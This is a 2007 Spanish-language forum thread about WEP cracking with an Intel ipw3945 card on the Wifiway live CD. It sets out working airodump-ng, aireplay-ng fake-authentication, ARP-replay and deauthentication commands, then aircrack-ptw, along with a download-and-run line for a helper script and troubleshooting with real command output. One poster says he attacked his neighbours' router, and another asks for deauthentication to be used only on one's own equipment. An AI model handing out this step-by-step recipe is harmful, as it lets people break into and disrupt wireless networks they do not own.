Seguridad Wireless - Wifi

Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: hadrianweb en 05-05-2007, 14:57 (Sábado)

Título: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 14:57 (Sábado)
Video inyeccion ipw3945

Espero que os ayude, y que os guste

Con formato de la web:

http://www.seguridadwireless.net/ipw3945.htm

Sin formato de la web: a fondo completo:

http://www.seguridadwireless.net/ipw3945full.htm

alojado ya en:

http://www./public/wifiway/videos/hadrianweb_ipw3945.swf

(http://www.youimg.net/uploads/70a473845e.png)

En primer luegar abrimos la carpeta /sys/class/net/wifi0/device

Ahi modificamos el rate y lo ponemos a 2

En la misma carpeta modificaremos el archivo que pone bssid y pondremos la mac del ap
tambien modificamos el archivo que pone channel por el canal correspondiente.

Una vez echo esto podremos inyectar tal y como lo hacemos con la demas tarjetas, pero esa vez con una peculiardad y es que para capturar usaremos la rtap0 y para inyectar la interfaz wifi0

La inyeccion seria de la siguiente forma:
Hacemos lo siguiente:
Citar
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
Citar
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Y en otra terminal distinta hacemos lo siguiente:
Citar
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
Citar
airodump-ng rtap0
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es

Citar
aircrack-ptw archivo.cap




P.D. Recordar levantar la interfaz wifi0 con el comando

Citar
ifconfig wifi0 up

----------------------------------------Edito-------------------------------------------


Segun acabo de leer(algo que puso rh3nt0n) el rate tambien se puede modificar con lo siguiente:

Tambien puedes usar lo siguiente:

Citar
ifconfig wifi0 down
chmod u+wrx /sys/class/net/wifi0/device/rate
echo 12 >/sys/class/net/wifi0/device/rate
echo <canal> >/sys/class/net/wifi0/device/channel


----------------


Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid

http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh


P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh

Para ejecutarlo simplemente deben de poner

./ipw3945.sh

Espero que lo disfruten ;D ;D ;D

Directo con shell (terminal)

wget http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh
chmod 777 ipw3945.sh
./ipw3945.sh

Y dejar ese terminal abierto, por si quereis ir haciendo mas cambios, esta script sera añadida en futuras versiones.

Título: Re: Manual: Inyeccion ipw3945
Publicado por: juanjetomas en 05-05-2007, 15:22 (Sábado)
Gracias campeón, eres el mejor, muchas gracia

 ;D  ;D  ;D

PD: ¿Cómo se mi mac?
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 15:43 (Sábado)
Simplemetnes escribe ifconfig y te la pone (en wifi0 claro esta)
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 16:08 (Sábado)
Bueno queda editado para el que quiera hacerlo de las dos formas.

Una cosa interesante, para el ataque 1 recordar ponerle despues del 1 los segundos yo lo pongo 0 por que con que se asocie una vez ya es suficiente
Título: Re: Manual: Inyeccion ipw3945
Publicado por: juanjetomas en 05-05-2007, 16:20 (Sábado)
Manual seguido paso a paso, y nada, leyendo paquetes se queda, lo que he observado es que ahora lee los paquetes mas lento.

hadrianweb, ¿cuanto te tarda en pillar el arp?

Es que cuando me asocio, me da un error, y me dice (en ingles) puede ser por estos motivos: no me acuerdo cuales son

Si alguien pudiera ponerme como conectarme a una red inalambrica mediante (seguramente con comandos), me ahorraría estar entrando y saliendo de windows, para mirar en el foro


Saludos



Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 16:27 (Sábado)
En primer lugar el recuerda que en la asociacion(ataque 1) debes poner ese 0, por que sino a mi tambien me daba el error

En segundo lugar una de las opciones de ese error de be de ser el rate asi que lo que debes hacer es comprobar si el rate esta bien.


Y finalmente, justo despues de empezar a inyectar comprueba que en el archivo bssid tienes la mac correcta y no 00:00:00:00:00
Título: Re: Manual: Inyeccion ipw3945
Publicado por: juanjetomas en 05-05-2007, 16:39 (Sábado)
Ok, voy a intentarlo de nuevo  ;D

Si  me sale(o no), tendré que volver a windows para contarlo, ya que no puedo navegar desde wifiway.

Pero la verdad es que me estoy liando con los nombres,¿ bssid es la mac, o station es la mac?
Es que si no tengo estos conceptos claros, poco voy a poder hacer.

Si alguien sabe como conectar, que lo cuente
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 16:40 (Sábado)
jaja ahora te lo digo
Título: Re: Manual: Inyeccion ipw3945
Publicado por: Hwagm en 05-05-2007, 17:05 (Sábado)
La conexion, bueno en esto no me podeis meter la bronca, esos drivers estan como vienen.

Supongo que habra que preguntarlo en:

http://intellinuxwireless.org/

Igual hay que cambiar de forama temporal con esto:

http://intellinuxwireless.org/?p=iwlwifi&n=howto-iwlwifi
Título: Re: Manual: Inyeccion ipw3945
Publicado por: guanchito03 en 05-05-2007, 17:44 (Sábado)
Hola!! Felicidades por la distribución.

Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato :(.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
 Aver si alguien me ayuda. Saludos

Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 17:48 (Sábado)
Bueno aqui les dejo un script que auntomatiza el proceso de el cambio de canal y rate asi como el del bssid

http://telefonica.net/web2/wifislax/wifiway/ipw3945.sh


P.D.Si les dice algo de permiso denegado, lo unico que tienen que hacer es poner chmod 777 ipw3945.sh

Para ejecutarlo simplemente deben de poner

./ipw3945.sh

Espero que lo disfruten ;D ;D ;D
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 17:53 (Sábado)
Hola!! Felicidades por la distribución.

Pero aun no he consigo que me inyecte, he seguido los pasos y se me queda cuando utilizo
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
Me sale sending authentication request todo el rato :(.
He realizado todos los pasos que salen en este post, en cuanto al archivo bssid me extraña q le introdujo la mac del ap, pero luego despues de utilizar este comando pues se me pone a 00:00:... de nuevo.
 Aver si alguien me ayuda. Saludos



Si te puso 00:00... pues en medio de la inyeccion cambiala y punto, porque asi es mas seguro
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 18:18 (Sábado)
Editado, jeje ahora ya tenemos un script que lo hace todo ;D ;D
Título: Re: Manual: Inyeccion ipw3945
Publicado por: Hwagm en 05-05-2007, 18:37 (Sábado)
bueno estoy contento por el tema de la ipw3945, los demas temas ya se iran tocando y se corregira lo que pueda para nuevas versiones, no hay prisa.
Título: Re: Manual: Inyeccion ipw3945
Publicado por: blackice2020 en 05-05-2007, 18:55 (Sábado)
Hola soy nuevo y estoy intentando inyectar con mi ipw3945
Tengo unas dudas, espero que me puedan ayudar a solucionarlas:

1º En donde tengo que guardar ./ipw3945.sh para que me lo encuentre al estar desde wifiway, puesto que lo guarde en un archivo que tengo en windows y cuando entro en wifiway lo ejecuto y me dice q no lo encuentra

2º Cuando modifico los archivos que me manda en el tutorial me dice que no puedo guardarlos. Es debido a que estoy ejecutando desde el live cd?

Espero que me puedan ayudar.

Un saludo y gracias de antemano
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 18:59 (Sábado)
Bueno en primer lugar el script ya modifica los archivos que dice el tutorial, asi que comencemos por lo del script

Entras en el directorio /mnt/
y ahi veras tus particiones, entras en la de windows y buscas donde te descargaste el archivo

Una vez encontrado, coges y lo copias en /root
Luego simplemente debes de hacer desde la terminal lo siguiente

chmod 777 ipw3945
./ipw3945.sh
Título: Re: Manual: Inyeccion ipw3945
Publicado por: blackice2020 en 05-05-2007, 19:07 (Sábado)
Gracias voy a intentarlo.
Saludos
Título: Re: Manual: Inyeccion ipw3945
Publicado por: guanchito03 en 05-05-2007, 19:24 (Sábado)
Llevo una hora con 400000 paquetes enviados y apenas 78 ARP, no se lo q me falta. Tb le cuesta autentificarse. Tengo q hacer varios intentos para q lo haga.
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 19:26 (Sábado)
Asegurate de que el archivo bssid esta cambiado, por el bssid del ap
Título: Re: Manual: Inyeccion ipw3945
Publicado por: blackice2020 en 05-05-2007, 19:27 (Sábado)
Acabo de intentar busar en el gestor de ficheros de wifiway y no consigo encontar mis documentos
Te agradecería que me comentases una ubicacion para el archivo q consideres acertada y me puedas decir como acceder a ella, ya te comente antes q no tengo idea de linux y por lo tanto me cuesta encontrar las cosas aunque me gustaría aprender.

Gracias
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 19:34 (Sábado)
jaja, ok te explico, desde windows te descargas el archivo, en el propio disco duro, sera lo mas facil, es decir en c:/

Luego una vez inicies el wifiway, el quito icono de los que aparece abajo lo abres, si te fijas el icono es una carpeta, te abre una ventana y a la izquierda aparece Sistema de ficheros, pues le das ahi, y luego en el apartado de la derecha pues buscas la carpeta mnt y la abres(con dos clicks) luego abres tu correspondiente particion de windows que puede ser o bien sda o hda u otra, y justo dentro de esa carpeta te tiene que aparece al ipw3945.sh,
entonces lo compias y lo pegas en /root, la carpeta root te aparece a la izquierda tambien
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 19:36 (Sábado)
Si tienes una tarjeta wifi usb, que tenga el soporte correspondiente,  se podria hacer directamente
Título: Re: Manual: Inyeccion ipw3945
Publicado por: guanchito03 en 05-05-2007, 19:51 (Sábado)
El archivo bssid si lo tengo bien. Lo dejo abierto para asegurarme q no me lo cambie, pero aun asi lo comprobe. Como se prueba otro tipo de ataque por si ve ma mejor??
Título: Re: Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 05-05-2007, 19:59 (Sábado)
Los ataque son aireplay -1 o -2 o -3 o -4 pero cada uno tiene sus difereciencias, todo es lo puedes encontrar en la pagina pricipal y en otros manuales
Título: Re: Video Inyeccion ipw3945 + Manual
Publicado por: hadrianweb en 06-05-2007, 23:26 (Domingo)
Bueno tras un fin de semana completo con el video de la inyeccion de la ipw3945 al final lo he conseguido.

Ha costado mucho trabajo.

Video inyeccion ipw3945

Espero que os ayude, y que os guste

Con formato de la web:

http://www.seguridadwireless.net/ipw3945.htm

Sin formato de la web: a fondo completo:

http://www.seguridadwireless.net/ipw3945full.htm
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Hwagm en 06-05-2007, 23:40 (Domingo)
pues yo me retiro ya, adios
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 07-05-2007, 02:34 (Lunes)
Bueno, y yo tambien me voy ;D ;D

Aqui se queda todo, por lo menos el video a quedado en la pagina y en el manual ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: pianista en 07-05-2007, 16:16 (Lunes)
Probado el chopchop con la ipw y funciona perfectamente, un ataque muy recomendable para hacer cuando el A3 nos falla pero hay station conectada ;D
saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: azzero en 07-05-2007, 16:49 (Lunes)
Hola. pues he seguido los paso y todo bien hasta que hago el ataque 3. he esperado mas de 30min y no me suben los ARP. tengo un data de 40 pero los arp no suben. hay alguna forma de solucionarlo?? el atauqe 1 me funciona y me asocio bien, pero incluso al repetir no suben los ARP. Muchas gracias
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 07-05-2007, 17:52 (Lunes)
No se si habras visto el video, pero en el indico que para acelerar el proceso de los arp, utilizo el ataque 0 y luego lo paro, este ultimo paso, el de pararlo es muy importante por que sino no subiran nunca


para ejecutar el ataque 0 utiliza lo siguiente

Citar
aireplay-ng -0 30 -a mac_ap wifi0

Para paralo pulsa Ctrl+c
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: gruke en 08-05-2007, 05:35 (Martes)
Y si fuera WPA?

Edito: Me he leido el foro un rato y por lo que veo es muy dificil sacar una WPA, primero necesitaria la handshake correcto?

Lo que no termino de entender es el cowpatty.
Seria posible con la ipw3945,suponiendo que tengo la clave en un Diccionario.
gracias

Cada vez me estoy acercando mas a linux ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: pianista en 08-05-2007, 09:47 (Martes)
Si, debes usar un A0 como el que tiene arriba hadrianweb hasta que consigas el handshake y despues pasarle diccionarios como un loco hasta que te la saque...
La verdad es que esta chungo...
Saludos
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: gruke en 08-05-2007, 18:06 (Martes)
Y para eso supongo que no es necesario cambiar el rate, o si??
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Hwagm en 08-05-2007, 19:43 (Martes)
Perfecto ahora si que se carga la foto inicial.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: bitelchus en 08-05-2007, 20:16 (Martes)

El video publicado de hadrianweb realmente va muy rapido para ver los comandos. Hay alguna manera de hacer  que vaya mas lento?
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 08-05-2007, 20:26 (Martes)
Bueno para la inyeccion son los mismo que el del manual, y ademas acelero el proceso de coger arp con el ataque 0, que se realiza de la siguiente forma

Citar
aireplay-ng -0 30 -a mac_ap wifi0

Pero recuerda para este ataque con el ctrl+c por que sino no subiran los arp
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: bitelchus en 08-05-2007, 22:28 (Martes)
No entiendo muy bien esto dle ctrl + c.....
Otra cosa: Si no se publica el ssid de la red como podemos forzar a que el AP nos lo diga?[
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 09-05-2007, 00:43 (Miércoles)
jeje ctrl + c es pulsar la tecla control + c, que sirve para detener un proceso ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Hwagm en 09-05-2007, 00:52 (Miércoles)
No entiendo muy bien esto dle ctrl + c.....
Otra cosa: Si no se publica el ssid de la red como podemos forzar a que el AP nos lo diga?[

aunque este oculto, siempre es visible en el momento en que cliente y punto de acceso se autentifica.

Te lo da el airodump-ng y el kismet, este ultimo en azul. Asi pues si se prodice en ese momento, la deduccion es logica, si bien no me gusta hablar de ese tipo de ataque, porque lo considero el de todos el menos etico si no es el equipo de uno mismo.

Aun asi, existe definido como ataque 0, y espero y deseo que solo lo uses con tus propios equipos.

https://hwagm.elhacker.net/htm/traduccion.htm

Citar
Ataque 0: desautenticación
Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar "saludos" WPA forzando a los clientes a reautentificarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados

y que el socio me perdone.  :-[

pd: obvia la palabra wpa.





Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 09-05-2007, 15:25 (Miércoles)
No pasa nada, y es que yo utilizo ese ataque contra mi propio router.

P.D. No sabia que bitelchus se referia a eso ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: naitse en 09-05-2007, 22:09 (Miércoles)
no me quedo muy claro... eh leido el enlace y el post de hwagm, pero no entendi tal ves como hacer para obterer el SSID :S... cuando lo probe en mi AP en un momento no lo veia pero de golpe aparecio el SSID que supuestamente deberia estar oculto, mi pregunta es si hay alguna manera de obtener o desocultar el SSID y no esperar a tener un golpe de suerte
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: unbas en 10-05-2007, 15:31 (Jueves)
con una desautentificacion, ya te he contestado en el otro hilo ...  ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: antoniohuesas en 10-05-2007, 22:08 (Jueves)
Hola a todos y enhorabuena por el curro y el aprendizaje de otros, buen equipo.
Oye tambien quiero haceros una pregunta, como puedo grabar el video de hadrianweb para verlo cuando esté en casa?
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: guanchito03 en 11-05-2007, 13:59 (Viernes)
si tiens mozzilla bajate un plugin que hay para descargar videos, hasta lo podras hacer de youtube.
 Yo lo hice :)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 11-05-2007, 22:10 (Viernes)
tambien puedes utilizar cualquier gestor de descargas y descargarlo al pc
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Tlacaelel en 23-05-2007, 23:12 (Miércoles)
HOLA MUCHO GUSTO. MI PREGUNTA ES LA SIGUIENTE:

EH VISTO EN SU PAGINA QUE SE PUEDE INYECTAR TRAFICO Y CAPTURAR CON LA TARJETA IPW3945 EH VISTO TAMBIEN QUE EN LA LISTA DE TARJETAS APARECE Y LA RECOMIENDAN MUCHO, ME GUSTARIA SABER DE ALGUIEN QUE HAYA INTENTADO EN INYECTANDO OH CAPTURANDO PAQUETES QUE TAN FUNCIONAL ES EN LA VELOCIDAD DE CAPTURA Y INYECCION. SE LOS AGRADECERIA MUCHO.ESPERO ME DISUCLPEN SI ACASO MOLESTE DE ALGUN MODO AL ESCRIBIR ESTAS LINEAS.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Hwagm en 23-05-2007, 23:39 (Miércoles)
no molestan , pero para laproxima en minusculas por favor, en internet, escribir en mayusculas es como gritar, pero supongo eso no lo sabias

Título: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 23-05-2007, 23:47 (Miércoles)
Hola.... quisiera preguntarte amigo hadrianweb sobre el tema del script, si es posible copiarlo o añadirlo a la iso y luego quemar la live d nuevo, para no tener q andar buscando el disco duro.

luego otra cosita, cuando se genera el archivo cap, éste se graba fisicamente en el disco duro, o el propio proceso lo lee automaticamente, o se tiene q ir a buscar al disco..... igual estoy diciendo una tonteria.

salu2.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Hwagm en 24-05-2007, 00:32 (Jueves)
Esa script ya la lleva la nueva wifiway-0.6.iso

Las capturas no se graban en el hdd, sino en memoria, a menos que las grabes en la partcion de windows o en un pendrive
Título: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 24-05-2007, 01:24 (Jueves)
Gracias Hwagm x responder.... entonces si no lo he entendido mal. cuando carga en modo terminal tipo windows, en una ventana escribo...

chmod 777 ipw3945
./ipw3945.sh

y entonces se carga la script.....no
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 24-05-2007, 01:31 (Jueves)
jeje, se supone que ya tienes los permisos, y ya esta en /bin o /sbin lo que significa que no es necesario tanto trabajo simplemente pon lo siguiente

Código: [Seleccionar]
ipw3945.sh
Título: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 24-05-2007, 23:51 (Jueves)
Me puede alguien indicar donde estal mal el proceso o q pueder ser el fallo. Despues d lanzar el script y poner los datos... este seria el orden.
>1terminal
canal = 6 , rate = 2 , bssid = mirouter

>2terminal
airodump-ng -w nombre rtp0 (corriendo)

>3terminal
aireplay-ng -3 -b mirouter -h portatil -x 1024 wifi0  (corriendo)
Esto sale : mas d 5 minutos
read 159513 packets ( got 97 ARP requests)
sent 130908 packets (69 pps)

>4terminal  (tambien lo he puesto  y quitado)
aireplay-ng -0 30 -a mirouter

>5terminal
aircrack-ptw nombre.cap
Esto sale :
Allocating a new table
bssid = mirouter     keyindex=0
stats for bssid mirouter    keyindex=0  packets=8
y nada mas...

luego veo q el archivo cap me lo pone él, con este nombre...
replay_arp-0524-200051.cap


salu2
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 25-05-2007, 00:16 (Viernes)
pues te falta el ataque 1 que es para asociarte al ap
Título: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 25-05-2007, 08:56 (Viernes)
a disculpa...t refieres a este :

aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0

esto tambien lo he echo.

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: *dudux en 25-05-2007, 13:14 (Viernes)
hadrian me ha gustado mucho el video................ ;)

mu bueno........


p.d. gracias por la dedicatoria...........;)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 25-05-2007, 13:18 (Viernes)
a disculpa...t refieres a este :

aireplay-ng -1 0 -e DLINK -a mirouter -h portatil wifi0

esto tambien lo he echo.


Mira el problema ya se cual es, si te fijas te pone 97 arp request, y debes tener mas por lo que tienes que esperar mas, lo de los 5min depende de muchos factores, pero, a ti cuando te ponga 50000 datas puedes pararlo y mirar y si no te va con eses ivs pues pruebas con mas ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: *dudux en 25-05-2007, 13:24 (Viernes)
no hace falta pararlo...................sino luego toca usar emergecap
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 25-05-2007, 13:28 (Viernes)
Denada *dudux, es lo cierto, me habeis ayudado mucho, y por lo tanto queria agradeceroslo ;) ;)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Southern en 27-05-2007, 06:14 (Domingo)
Hola a todos, ante todo felicitarles por esta gran web :)

Estaba documentándome un poco sobre este tema y decidí probar probar este ataque contra el router de mis vecinos, que son amigos mios y por supuesto no hay problema  :)

La cosa es que cuando llego a la parte de ejecutar el aireplay para aumentar el tráfico, el programa rompe tal que así:

benihana:/home/javi#  aireplay-ng -3 -b 00:02:6F:31:2B:42 -h 00:30:CD:00:00:09 eth1

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
or ARPHRD_IEEE80211_PRISM instead.  Make sure RFMON is enabled:
run 'ifconfig eth1 up; iwconfig eth1 mode Monitor channel <#>'
Sysfs injection support was not found either.

Hasta ahí supuse que sería algún problema de mi tarjeta respecto al tema de inyectar paquetes, por lo que decidí bajar el scrip de hadrianweb para mi intel pro wireless 3945ABG, pero la cosa es que mi tarjeta tiene como nombre de interfaz eth1 en vez de wifi0, por lo que traté de modificar el script sustituyendo wifi0 por eth1 en todas las instrucciones, lo que me devolvió los siguientes errores:

Por favor introduce el canal para la wifi0
2
Indique el rate de captura
2
Indique el bssid para el asociado, separado por puntos (Ej: 00:11:22:33:44:55)
00:30:CD:00:00:09
chmod: no se puede acceder a «/sys/class/net/eth1/device/rate»: No existe el fichero o el directorio
./ipw3945.sh: line 20: /sys/class/net/eth1/device/rate: Permiso denegado
./ipw3945.sh: line 21: /sys/class/net/eth1/device/channel: Permiso denegado
./ipw3945.sh: line 22: /sys/class/net/eth1/device/bssid: Permiso denegado

La cosa es que dichas carpetas o archivos no existen... ¿ Me falta algún paquete por instalar en mi sistema o algo así?

Muchas gracias de antemano por la ayuda ofrecida con este gran tutorial y por leer mis estúpidas preguntas xDD

Un saludo y nos leemos pronto!!!  :D

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: chacki en 28-05-2007, 20:29 (Lunes)
Hola amigos!!!

A mi tambien me da problemas es script.

Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.

he mirado a ver si estan esos archivos y efectivamente no estan.

Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)

Pues no encuentro esos archivos dentro de ninguna interfaz...

He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.

PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.

Alguien me puede ayudar??

Gracias.

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: chacki en 28-05-2007, 20:33 (Lunes)
Hola amigos!!!

A mi tambien me da problemas es script.

Cuando lo ejecuto me dice que no encuentra los archivos rate, channel y bssid.

he mirado a ver si estan esos archivos y efectivamente no estan.

Dentro del directorio /sys/class/net/ tengo los directorios ath0, ath1, wifi0 y eth1 (es decir uno por interface)

Pues no encuentro esos archivos dentro de ninguna interfaz...

He probado a crearlos manualmente dentro de /sys/class/net/ath1/device y no hay manera, no me deja.

PD: uso la interfaz ath1 para sniffar, la creo con wlanconfig en modo monitor, es la unica manera que tengo de poner la tarjeta de red en modo monitor.

Alguien me puede ayudar??

Gracias.

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: chacki en 28-05-2007, 20:38 (Lunes)
Hola Southern,
yo no se mucho pero...

me parece que para empezar estas utilizando la interfaz incorrecta no?

si haces un iwconfig a secas, te dice que eth1 es una interfaz wireless?

Normalmente esa es la ethernet.

PD: Perdon por duplicar el mensaje anterior.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 28-05-2007, 21:03 (Lunes)
Chucki la interfaz que tienes que utilizar es rtap0 y wifi0 esta ultima para la inyeccion, y no la ath0 o ath1 como tu dices
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: chacki en 28-05-2007, 21:18 (Lunes)
Hola Hadrianweb,

la interfaz rtap0 no me sale, la wifi0 sí.

Pero el caso es que dentro del directorio /sys/class/net/wifi0/device   no tengo los archivos channel, bssid y rate.

Porque no los tengo??


Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 28-05-2007, 21:54 (Lunes)
1º) Porque no tienes bien cargado el live cd, probable consecuencia de un mal grabado (lo mas seguro)

2º) Porque tienes desactivada la tarjeta wifi, es decir, dale al botoncito del portatil con el cual la activas
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 28-05-2007, 22:32 (Lunes)
Hola.....disculpa hadrianweb pero he estado fuera y no he podido probar lo q me indicaste. Hoy he realizado las pruebas.....y como bien me digiste lo he dejado subir mas los ARP, y lo resultados siguen igual.

1ª Hora corriendo :

read 220.300 packets (got 155 ARP)  37 pps  (archivo.cap - 22 mb)

2ª Hora corriendo :

read 232.500 packets (got 162 ARP)  37 pps  (archivo.cap - 28 mb)

3ª Hora corriendo :

read 300.000 packets (got 175 ARP)   37 pps  (archivo.cap - 41 mb)

al lanzar el aircrack, lo unico q varia son los packets, lo demas esta todo igual.
1. 1900
2. 2474
3. 2597

Otra cosa queria preguntarte....al definir el archivo cap en el airodump hay q poner o es necesario el parametro IVS.

Luego en la carga del live aparece este error....

mount cánt  sys / etc / fsbab  or  etc / mtb            ( failed )

Puede estar relacionado ? q puede ser.

salu2.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 29-05-2007, 00:00 (Martes)
No el error ese que dices no se debe a eso.

Y se supone que lo estas haciendo bien, lo que ocurre es que no te inyecta muy rapido ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 29-05-2007, 14:23 (Martes)
ya...entonces, q significa y q puedo hacer para solucionarlo. Xq la tarjeta del portatil no creo q este mal, aún asi, hay alguna forma d realizarla algún tipo d test d verificación.

salu2.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 29-05-2007, 19:47 (Martes)
Una cosa es probable que no esteas bien auntentificado comprueba eso
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 29-05-2007, 21:55 (Martes)
perdoname hadrian.....pero estoy totalmente desorientado y confuso, ya no se q mas hacer. Me podrias indicar como hacerlo.

T agradezco d antemano tu preciada ayuda.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 30-05-2007, 02:01 (Miércoles)
Pues mira este es el comando

Código: [Seleccionar]
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
So te funciona debe de aparecete una cara asi :-) sino puede significar que el rate no estra cambiado o que estas muy lejos del ap, o que el router no es vulnerable a ese ataque ...etc
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: KuaSha en 31-05-2007, 14:57 (Jueves)
Hola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
canal 6 - rate 2 - bssid
4. airodump-ng -c 6 -w nombre rtap0 ......dejo corriendo
5.aireplay-ng -1 0 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)

6.aireplay-ng -3 -b bssid -h mimac wifi0.......dejo corriendo
7.aircrack-ptw nombre-01.cap

esto aparece
allocating a new table
bssid = xx:01  (mia)     keyindex=0
allocating a new table
bssid = xx:02               keyindex=0
allocating a new table
bssid = xx:03               keyindex=0
stats for bssid xx:01  keyindex =0 packects=1155
stats for bssid xx:02  keyindex =0 packects=34
stats for bssid xx:03  keyindex =0 packects=1

ahora el q me digsite tu...

aireplay-ng -1 30 -a bssid -h mimac -e essid wifi0.....dejo abierto

con este el resultado es el siguiente :
hora : waiting for beacon frame  (BSSID : xx:xx:xx:....)
hora : sending authentication request
hora : authentication successful
hora . sending assocciation request
hora : association successful  :-)
hora :sending keep alive packet
sending authentication request
sending authentication request
sending authentication request
sending authentication request

ahi se queda....... el Ap esta a unos 5 metros.


Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 31-05-2007, 17:19 (Jueves)
Citar
como lo hacias esta correctoHola d nuevo..... esto cada vez es mas raro....t pongo los pasos q hago.
1. En el arranq he puesto los 3 tipos d teclados o juego d caracteres.
2.entro con startx
3. abro terminal :ipw3945.sh
